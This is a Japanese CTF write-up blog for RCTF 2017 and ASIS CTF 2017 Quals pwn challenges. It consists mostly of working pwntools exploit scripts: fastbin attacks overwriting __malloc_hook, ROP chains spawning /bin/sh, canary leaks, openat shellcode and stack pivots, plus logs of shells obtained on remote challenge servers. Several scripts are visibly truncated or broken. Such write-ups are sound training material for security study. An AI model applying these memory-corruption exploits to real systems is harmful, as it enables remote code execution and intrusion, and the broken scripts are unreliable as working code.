bss上に存在する管理領域で、off-by-one BOFが存在する。書き潰せる箇所は、malloc()で取得したポインタなので、ある程度任意の箇所でfree()ができる。 double freeができるので、fastbin dupからfastbin attackをした。__malloc_hookを書き換えてone gadget RCEを使った。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug' # output verbose log

RHOST = "rnote.2017.teamrois.cn"
RPORT = 7777
LHOST = ""
LPORT = 7777

# libc = ELF('./libc.so.6')
elf = ELF('./RNote')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=./libc.so.6
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./RNote'], execute=execute)
    conn = process(['./RNote'])
    # conn = process(['./RNote'], env={'LD_PRELOAD': './libc.so.6'})

# preparing for exploitation

def add_note(size, name, content):
    conn.sendlineafter('Your choice: ', '1')
    conn.sendlineafter('Please input the note size: ', str(size))
    conn.sendafter('Please input the title: ', name)
    conn.sendafter('Please input the content: ', content)

def delete_note(idx):
    conn.sendlineafter('Your choice: ', '2')
    conn.sendlineafter('Which Note do you want to delete: ', str(idx))

def show_note(idx): 
    conn.sendlineafter('Your choice: ', '3')
    conn.sendlineafter('Which Note do you want to show: ', str(idx))
    conn.recvuntil('note title: ')
    name = conn.recvline()
    conn.recvuntil('note content: ')
    content = conn.recvuntil('***********************')
    return (name, content)


# idx = 0
add_note(0xa0, '\x10'*0x11, 'b'*0xa0)
(buf, _) = show_note(0)
buf = buf.split('\n')[0]
heap_base = u64(buf[16:].ljust(0x8, '\x00')) - 0x10
log.info('heap_base = {:#x}'.format(heap_base))  

add_note(0x40, 'hoge\n', 'c'*0x40)  # idx=1
add_note(0xa0, 'fuga\n', '\n')     # idx=0
(_, buf) = show_note(0)
libc_base = u64(buf[:6].ljust(8, '\x00')) - 0x3c3b0a
log.info('libc_base = {:#x}'.format(libc_base))

add_note(0x60, 'AAAAAA\n', 'c'*0x60)  # idx=2
add_note(0x60, 'BBBBBB\n', 'c'*0x60)  # idx=3
add_note(0x10, '\x10'*0x11, 'fd')     # idx=2

offset = 0x3c3af5-8 
add_note(0x60, 'fastbin\n', p64(libc_base + offset) + "\n")
add_note(0x60, 'a\n', 'a\n')
add_note(0x60, 'a\n', 'a\n')
payload = ''
payload = '\x00'*3
payload += p64(0) * 2
payload += p64(libc_base+0xf0567)
#payload = payload.ljust(0x67,'x')
add_note(0x68, 'a\n', payload + '\n')
% python exploit.py r
[*] '/home/hama/ctf/RCTF2017/RNote/RNote'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Opening connection to rnote.2017.teamrois.cn on port 7777: Done
[*] Pwning
[*] heap_base = 0x1201000
[*] libc_base = 0x7f979d363000
[*] Switching to interactive mode
1.Add new note
2.Delete a note
3.Show a note
Your choice: $ 1
$ 10
Please input the note size: $ ls
$ cat flag

RNote2 (Pwn 606pt)

expand機能でめんどくさい感じのバグがあり、直下のchunkのsizeを上書きできる。unsortedbinにつながっているchunkのsizeをより大きい値で上書きしてoverlapを起こした。 適当にfastbin attackをして、one gadget RCEを使った。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug' # output verbose log

RHOST = "rnote2.2017.teamrois.cn"
RPORT = 6666
LHOST = ""
LPORT = 6666

# libc = ELF('./libc.so.6')
elf = ELF('./RNote2')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=./libc.so.6
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./RNote2'], execute=execute)
    conn = process(['./RNote2'])
    # conn = process(['./RNote2'], env={'LD_PRELOAD': './libc.so.6'})

def add_note(length, content):
    conn.sendlineafter('Your choice:', '1')
    conn.sendafter('Input the note length:', str(length))
    conn.sendafter('Input the note content:', content)

def delete_note(idx):
    conn.sendlineafter('Your choice:', '2')
    conn.sendlineafter('Which note do you want to delete?', str(idx))

def list_note():
    conn.sendlineafter('Your choice:', '3')
def edit_note(idx, content):
    conn.sendlineafter('Your choice:', '4')
    conn.sendlineafter('Which note do you want to edit?', str(idx))
    conn.sendafter('Input new content:', content)

def expand_note(idx, length, content):
    conn.sendlineafter('Your choice:', '5')
    conn.sendlineafter('Which note do you want to expand?', str(idx))
    conn.sendlineafter('How long do you want to expand?', str(length))
    conn.sendafter('Input content you want to expand', content)

# preparing for exploitation


# leak libc
add_note(0x90+8, 'a'*0x98)  # id = 1
add_note(0x90+8, 'a'*0x98)  # id = 1
add_note(0x20, '\n')
conn.recvuntil('Note content: ')
conn.recvuntil('Note content: ')
libc_base = u64(conn.recv(6).ljust(8, '\x00')) - 0x3c3c0a 
log.info('libc_base = {:#x}'.format(libc_base))

# leak heap_base
add_note(0x38, '\n')
add_note(0x28, 'b'*0x10+'\n')
heap_base = u64(conn.recv(6).ljust(8, '\x00')) - 0xa
log.info('heap_base = {:#x}'.format(heap_base))

add_note(0x38, 'hoge\n')    # id = 3
add_note(0x100, 'd'*0x100)
add_note(0x68, 'e'*0x68)
add_note(0x28, 'f'*0x28)
expand_note(4,0x80, '\xff'*0x80)

payload = 'x' * 0x88
payload += p64(0x31)
payload += p64(0x0)
payload += p64(0xc8)
payload += p64(0x0)
payload += p64(heap_base)
payload += p64(heap_base)
payload += p64(0x71)
payload += p64(libc_base + 0x3c3aed)
payload += "\n"

add_note(0xd0-8, payload)
add_note(0x70-8, '\n')
payload = '\x00' * 3
payload += p64(0x0) * 2
payload += p64(libc_base + 0xf5b10)
add_note(0x70-8, payload +'\n')

% python exploit.py r
[!] Couldn't find relocations against PLT to get symbols
[*] '/home/hama/ctf/RCTF2017/RNote2-dir/RNote2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to rnote2.2017.teamrois.cn on port 6666: Done
[*] Pwning
[*] libc_base = 0x7fa60f4da000
[*] heap_base = 0x55a6b6dbe000
[*] Switching to interactive mode

1.Add new note
2.Delete a note
3.List all note
4.Edit a note
5.Expand a note
Your choice:
$ 1
Input the note length:
$ 10
$ ls
$ cat flag


ダラダラと解いていたので時間がかかった。難易度的には初心者向けよりちょっと上ぐらいに感じた。aiRcraftは時間がなかったので諦めた。solve数的には解けたと思うので速度を上げたい。 あとは、もっとrevをできるようになりたい。

ASIS CTF 2017 Quals writeup


TokyoWesternsで参加して4933ptで3位だった。そのうち998ptを取った。 解いてflagを出したのは、Random generator、Defaulter、CRC、Stard hard、Ca…gF remastered、CTF Surveyの6問(実質5問)だった。

Random generator (Warm-up, Pwning 95pt)


#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
# context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 4000
LHOST = ""
LPORT = 4000

# libc = ELF('')
elf = ELF('./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'], execute=execute)
    conn = process(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'])
    # conn = process(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'], env={'LD_PRELOAD': ''})

# preparing for exploitation

def leak(idx):
    conn.sendlineafter('What random value do you want to get?', str(idx))
    conn.recvuntil('Your value = ')
    buf = conn.recvline()
    buf = buf.strip('\n')
    return int(buf)

# 0x00400f8c: pop rax ; pop rdi ; ret  ;  (1 found)
# 0x00400f61: pop rsi ; pop r15 ; ret  ;  (1 found)
# 0x00400f88: mov rdx, rsi ; ret  ;  (1 found)
# 0x00400f8f: syscall  ;  (1 found)
pop_rax_rdi = 0x00400f8c
pop_rsi_r15 = 0x00400f61
mov_rdx_rsi = 0x00400f88
syscall = 0x00400f8f
bss_base = 0x602340

bufsize = 0x410 - 8


rop = ""
# read(stdin, bss, 0x100)
# rdx = 0x100 size
rop += p64(pop_rsi_r15)
rop += p64(0x100)
rop += p64(0x0)
rop += p64(mov_rdx_rsi)
# rsi = bss *buf
rop += p64(pop_rsi_r15)
rop += p64(bss_base)
rop += p64(0x0)
# rdi = 0 fd, rax = 0 SYS_read
rop += p64(pop_rax_rdi)
rop += p64(0x0)
rop += p64(0x0)
# syscall
rop += p64(syscall)

# system(&"/bin/sh", NULL, NULL)
# rdx = NULL
rop += p64(pop_rsi_r15)
rop += p64(0x0)
rop += p64(0x0)
rop += p64(mov_rdx_rsi)
# rsi = NULL
rop += p64(pop_rsi_r15)
rop += p64(0x0)
rop += p64(0x0)
# rdi = &"/bin/sh"
rop += p64(pop_rax_rdi)
rop += p64(59)
rop += p64(bss_base)
rop += p64(syscall)

binsh = "/bin/sh\x00"

canary = 0
for i in range(1, 8):
    print i
    buf = leak(i)
    canary += buf << ((i) * 8)
print hex(canary)

payload = "A" * bufsize
payload += p64(canary)
payload += "XXXXYYYY"
payload += rop

# payload += rop

# ASIS{e77c4a76d8079b330e7e78e8e3f434c4}

Defaulter (Pwning 186pt)

blind問。バイナリがないのでまずはテキスト領域をダンプした。write, read, openatが許可されているので、flagを開いて読んだ。openatの第一引数を-100にするとopenと同じ動きをするらしい。あとはやるだけ。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 10001
LHOST = ""
LPORT = 4000

# libc = ELF('')
# elf = ELF('./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'], execute=execute)
    conn = process(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'])
    # conn = process(['./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'], env={'LD_PRELOAD': ''})

# preparing for exploitation

# leak text

text_base = 0x400000

shellcode = '''
push 0x30
pop rax
xor al, 0x30
push rax
mov rax, 0x67616c662f2f2f2e
push rax

mov rdi, -100
mov rsi, rsp
xor rdx, rdx
xor r10, r10
mov rax, 257

mov rdi, rax
mov rsi, 0x601810
mov rdx, 0x100
xor rax, rax

mov rdi, 0x1
mov rsi, 0x601810
mov rdx, 0x100
mov rax, 1

conn.recvuntil('The shellcode to execute:')
print repr(asm(shellcode))

print repr(conn.recv(1024))
print repr(conn.recv(1024))

# ASIS{r34d_wr1t3_sh3llc0de_w1th_0pen4t_:-P}

CRC (Pwning 123pt)


#!/usr/bin/env python
from pwn import *
import json

context(os='linux', arch='i386')
# context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 4002
LHOST = ""
LPORT = 4002

# libc = ELF('')
elf = ELF('./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d'], execute=execute)
    conn = process(['./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d'])
    # conn = process(['./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d'], env={'LD_PRELOAD': ''})

# preparing for exploitation
bufsize = 100
stdout_addr = 0x804a024
#stdout_offset = 0x1b0d60
stdout_offset = 0x1b2d60
libc_start_main_got = 0x8049ff0
libc_start_main_offset = 0x0018540
master_canary_offset = 0x1e5954
system_offset = 0x0003a940
binsh_offset = 0x158e8b

f = open('table.json', 'r')
d = json.load(f)

def CRC(size, payload):
    conn.sendlineafter('Choice: ', str(1))
    conn.sendlineafter('What is the length of your data: ', str(size))
    conn.sendlineafter('bytes to process: ', payload)
    conn.recvuntil('CRC is: ')
    return int(conn.recv(10), 16)

def search(h):
    for k, v in d.items():
        if v == h:
            return int(k)
    return -1


payload = "\x00" * bufsize
payload += p32(stdout_addr)

#print hex(CRC(1, "\x00" * bufsize + p32(stdout_addr + 0)))
#print hex(CRC(1, "\x00" * bufsize + p32(stdout_addr + 1)))
#print hex(CRC(1, "\x00" * bufsize + p32(stdout_addr + 2)))
#print hex(CRC(1, "\x00" * bufsize + p32(stdout_addr + 3)))

buf = ''
buf += chr(search(CRC(1, "\x00" * bufsize + p32(libc_start_main_got + 0))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(libc_start_main_got + 1))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(libc_start_main_got + 2))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(libc_start_main_got + 3))))

libc_base = u32(buf) - libc_start_main_offset
log.info('libc_base = {:#x}'.format(libc_base))
master_canary = libc_base + master_canary_offset
# master_canary = libc_base + binsh_offset

#print hex(CRC(1, "\x00" * bufsize + p32(master_canary + 0)))
#print hex(CRC(1, "\x00" * bufsize + p32(master_canary + 1)))
##print hex(CRC(1, "\x00" * bufsize + p32(master_canary + 2)))
#print hex(CRC(1, "\x00" * bufsize + p32(master_canary + 3)))
buf = ''
buf += chr(search(CRC(1, "\x00" * bufsize + p32(master_canary + 0))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(master_canary + 1))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(master_canary + 2))))
buf += chr(search(CRC(1, "\x00" * bufsize + p32(master_canary + 3))))
log.info('canary = {:#x}'.format(u32(buf)))

payload = "A" * 0x28
payload += buf
payload += "AAAA" * 3
payload += p32(libc_base + system_offset)
payload += "BBBB"
payload += p32(libc_base + binsh_offset)


# ASIS{db17755326b5df9dab92e18e43c3ee51}
% cat table.json 
{"0": 3523407757, "1": 2768625435, "2": 1007455905, "3": 1259060791, "4": 3580832660, "5": 2724731650, "6": 996231864, "7": 1281784366, "8": 3705235391, "9": 2883475241, "10": 3523407757, "11": 1171273221, "12": 3686048678, "13": 2897449776, "14": 901431946, "15": 1119744540, "16": 3484811241, "17": 3098726271, "18": 565944005, "19": 1455205971, "20": 3369614320, "21": 3219065702, "22": 651582172, "23": 1372678730, "24": 3245242331, "25": 3060352845, "26": 794826487, "27": 1483155041, "28": 3322131394, "29": 2969862996, "30": 671994606, "31": 1594548856, "32": 3916222277, "33": 2657877971, "34": 123907689, "35": 1885708031, "36": 3993045852, "37": 2567322570, "38": 1010288, "39": 1997036262, "40": 3887548279, "41": 2427484129, "42": 163128923, "43": 2126386893, "44": 3772416878, "45": 2547889144, "46": 248832578, "47": 2043925204, "48": 4108050209, "49": 2212294583, "50": 450215437, "51": 1842515611, "52": 4088798008, "53": 2226203566, "54": 498629140, "55": 1790921346, "56": 4194326291, "57": 2366072709, "58": 336475711, "59": 1661535913, "60": 4251816714, "61": 2322244508, "62": 325317158, "63": 1684325040, "64": 2766056989, "65": 3554254475, "66": 1255198513, "67": 1037565863, "68": 2746444292, "69": 3568589458, "70": 1304234792, "71": 985283518, "72": 2852464175, "73": 3707901625, "74": 1141589763, "75": 856455061, "76": 2909332022, "77": 3664761504, "78": 1130791706, "79": 878818188, "80": 3110715001, "81": 3463352047, "82": 1466425173, "83": 543223747, "84": 3187964512, "85": 3372436214, "86": 1342839628, "87": 655174618, "88": 3081909835, "89": 3233089245, "90": 1505515367, "91": 784033777, "92": 2967466578, "93": 3352871620, "94": 1590793086, "95": 701932520, "96": 2679148245, "97": 3904355907, "98": 1908338681, "99": 112844655, "100": 2564639436, "101": 4024072794, "102": 1993550816, "103": 30677878, "104": 2439710439, "105": 3865851505, "106": 2137352139, "107": 140662621, "108": 2517025534, "109": 3775001192, "110": 2013832146, "111": 252678980, "112": 2181537457, "113": 4110462503, "114": 1812594589, "115": 453955339, "116": 2238339752, "117": 4067256894, "118": 1801730948, "119": 476252946, "120": 2363233923, "121": 4225443349, "122": 1657960367, "123": 366298937, "124": 2343686810, "125": 4239843852, "126": 1707062198, "127": 314082080, "128": 1069182125, "129": 1220369467, "130": 3518238081, "131": 2796764439, "132": 953657524, "133": 1339070498, "134": 3604597144, "135": 2715744526, "136": 828499103, "137": 1181144073, "138": 3748627891, "139": 2825434405, "140": 906764422, "141": 1091244048, "142": 3624026538, "143": 2936369468, "144": 571309257, "145": 1426738271, "146": 3422756325, "147": 3137613171, "148": 627095760, "149": 1382516806, "150": 3413039612, "151": 3161057642, "152": 752284923, "153": 1540473965, "154": 3268974039, "155": 3051332929, "156": 733688034, "157": 1555824756, "158": 3316994510, "159": 2998034776, "160": 81022053, "161": 1943239923, "162": 3940166985, "163": 2648514015, "164": 62490748, "165": 1958656234, "166": 3988253008, "167": 2595281350, "168": 168805463, "169": 2097738945, "170": 3825313147, "171": 2466682349, "172": 224526414, "173": 2053451992, "174": 3815530850, "175": 2490061300, "176": 425942017, "177": 1852075159, "178": 4151131437, "179": 2154433979, "180": 504272920, "181": 1762240654, "182": 4026595636, "183": 2265434530, "184": 397988915, "185": 1623188645, "186": 4189500703, "187": 2393998729, "188": 282398762, "189": 1741824188, "190": 4275794182, "191": 2312913296, "192": 1231433021, "193": 1046551979, "194": 2808630289, "195": 3496967303, "196": 1309403428, "197": 957143474, "198": 2684717064, "199": 3607279774, "200": 1203610895, "201": 817534361, "202": 2847130659, "203": 3736401077, "204": 1087398166, "205": 936857984, "206": 2933784634, "207": 3654889644, "208": 1422998873, "209": 601230799, "210": 3135200373, "211": 3453512931, "212": 1404893504, "213": 616286678, "214": 3182598252, "215": 3400902906, "216": 1510651243, "217": 755860989, "218": 3020215367, "219": 3271812305, "220": 1567060338, "221": 710951396, "222": 3010007134, "223": 3295551688, "224": 1913130485, "225": 84884835, "226": 2617666777, "227": 3942734927, "228": 1969605100, "229": 40040826, "230": 2607524032, "231": 3966539862, "232": 2094237127, "233": 198489425, "234": 2464015595, "235": 3856323709, "236": 2076066270, "237": 213479752, "238": 2511347954, "239": 3803648100, "240": 1874795921, "241": 414723335, "242": 2175892669, "243": 4139142187, "244": 1758648712, "245": 534112542, "246": 2262612132, "247": 4057696306, "248": 1633981859, "249": 375629109, "250": 2406151311, "251": 4167943193, "252": 1711886778, "253": 286155052, "254": 2282172566, "255": 4278190080}

Start hard (Pwning 201pt)

類題を解いたことがあるので、やるだけだった。blute forceとか必要ない。やるだけ

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
# context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 10001
LHOST = ""
LPORT = 10001

# libc = ELF('')
elf = ELF('./start_hard_c8b452f5aab9a474dcfe1351ec077a601fdf8249')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./start_hard_c8b452f5aab9a474dcfe1351ec077a601fdf8249'], execute=execute)
    conn = process(['./start_hard_c8b452f5aab9a474dcfe1351ec077a601fdf8249'])
    # conn = process(['./start_hard_c8b452f5aab9a474dcfe1351ec077a601fdf8249'], env={'LD_PRELOAD': ''})

# preparing for exploitation

bufsize = 24

bss_stage = 0x601880
one_gadget = 0x0f0567
read_got = 0x601018
# 0x004005c3: pop rdi ; ret  ;  (1 found)
# 0x004005c1: pop rsi ; pop r15 ; ret  ;  (1 found)
pop_rdi = 0x004005c3
pop_rsi_r15 = 0x004005c1
# 0x004005ba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret  ;  (1 found)
pop_rbx_rbp_r12_r13_r14_r15 = 0x004005ba
# 0x00400550: leave  ; ret  ;  (1 found)
leave_ret = 0x00400550
# 0x00400490: pop rbp ; ret  ;  (2 found)
pop_rbp = 0x00400490
    0x4005a0:    mov    rdx,r13
    0x4005a3:    mov    rsi,r14
    0x4005a6:    mov    edi,r15d
    0x4005a9:    call   QWORD PTR [r12+rbx*8]
call_r12 = 0x004005a0


# read
payload = "A" * bufsize
payload += p64(pop_rbx_rbp_r12_r13_r14_r15)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got)
payload += p64(0x200)
payload += p64(bss_stage)
payload += p64(0)
payload += p64(call_r12)
payload += "XXXXXXXX" * 7
# read
payload += p64(pop_rbx_rbp_r12_r13_r14_r15)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got)
payload += p64(0x1)
payload += p64(read_got)
payload += p64(0)
payload += p64(call_r12)
payload += "XXXXXXXX" * 7
# stack pivot
payload += p64(pop_rbp)
payload += p64(bss_stage)
payload += p64(leave_ret)
payload += "\x00" * (0x400 - len(payload))

payload = p64(0x00000400406)
payload += p64(pop_rbx_rbp_r12_r13_r14_r15)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got)
payload += p64(0x8)
payload += p64(read_got)
payload += p64(1)
payload += p64(call_r12)
payload += "XXXXXXXX" * 7

payload += p64(pop_rbx_rbp_r12_r13_r14_r15)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(bss_stage)
payload += p64(0x80)
payload += p64(bss_stage + 0x300)
payload += p64(0)
payload += p64(call_r12)
payload += "XXXXXXXX" * 7
payload += p64(pop_rbp)
payload += p64(bss_stage + 0x300)
payload += p64(leave_ret)
payload += "A" * (0x200 - len(payload))

libc_base = u64(conn.recv(8)) - 0x00f66d0
log.info("libc_base = {:#x}".format(libc_base))

payload = "AAAABBBB"
payload += p64(libc_base + 0x4526a)
payload += "\x00" * (0x80 - len(payload))

# ASIS{n0_exec_stack_slapped_ma_f4c3_hehe_____}

Ca…gF remastered (Pwning 384pt)

heapが良くわからないので、なんとなくでやった。隣にいたheapのプロに色々と聞きながらだったので解けた。適当にheapとlibcのアドレスをリークさせ、fastbin dupでチャンクの共有状態を作りだしてfastbin attackで、stdoutのvtable ptrを書き換えた。あとは適当なOne gadget RCEが使えた。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
# context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 10001
LHOST = ""
LPORT = 10001

# libc = ELF('')
elf = ELF('./CaNaKMgF_remastered')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./CaNaKMgF_remastered'], execute=execute)
    conn = process(['./CaNaKMgF_remastered'])
    # conn = process(['./CaNaKMgF_remastered.bin_e70ec4b07287604ad59ae59f9cb170ab60a0cc5c'], env={'LD_PRELOAD': ''})

# preparing for exploitation

def Allocate(size, payload):
    conn.recvuntil('5. Run away')
    conn.recvuntil('Length? ')

def Free(idx):
    conn.recvuntil('5. Run away')
    conn.recvuntil('Num? ')

def Read(idx):
    conn.recvuntil('5. Run away')
    conn.recvuntil('Num? ')


Allocate(0x28, "A" * 0x28)  # 0
Allocate(0x28, "B" * 0x28)  # 1
Allocate(0x28, "C" * 0x28)  # 2

heap_base = u64(conn.recv(6) + "\x00\x00") - 0x30
log.info('heap_base = {:#x}'.format(heap_base))

Allocate(0x500, "A")
libc_base = u64(conn.recv(6) + "\x00\x00") - 0x3c3bc8
log.info('libc_base = {:#x}'.format(libc_base))

Allocate(0x68, "X" * 0x60) # 4
Allocate(0x68, "Y") # 5

Allocate(0x68, p64(libc_base + 0x3c46c5 - 0x8))    # 6
Allocate(0x68, "A")  # 7

dummy = "A" * 8
dummy += "B" * 8
dummy += "C" * 8
dummy += p64(libc_base + 0x4526a)
dummy += "E" * 8
dummy += "F" * 8
dummy += "G" * 8
dummy += p64(libc_base + 0x791e0)
Allocate(0x68, dummy)  # 8

payload = "\x00" * 3
payload += "\x00" * (8 * 3)
payload += p64(0xffffffff)
payload += "\x00" * 8 
payload += p64(heap_base + 0xa0)
Allocate(0x68, payload)  # 9


# ASIS{full_relro_fastbin_attack!!!!!!_:-P}

CTF Survey


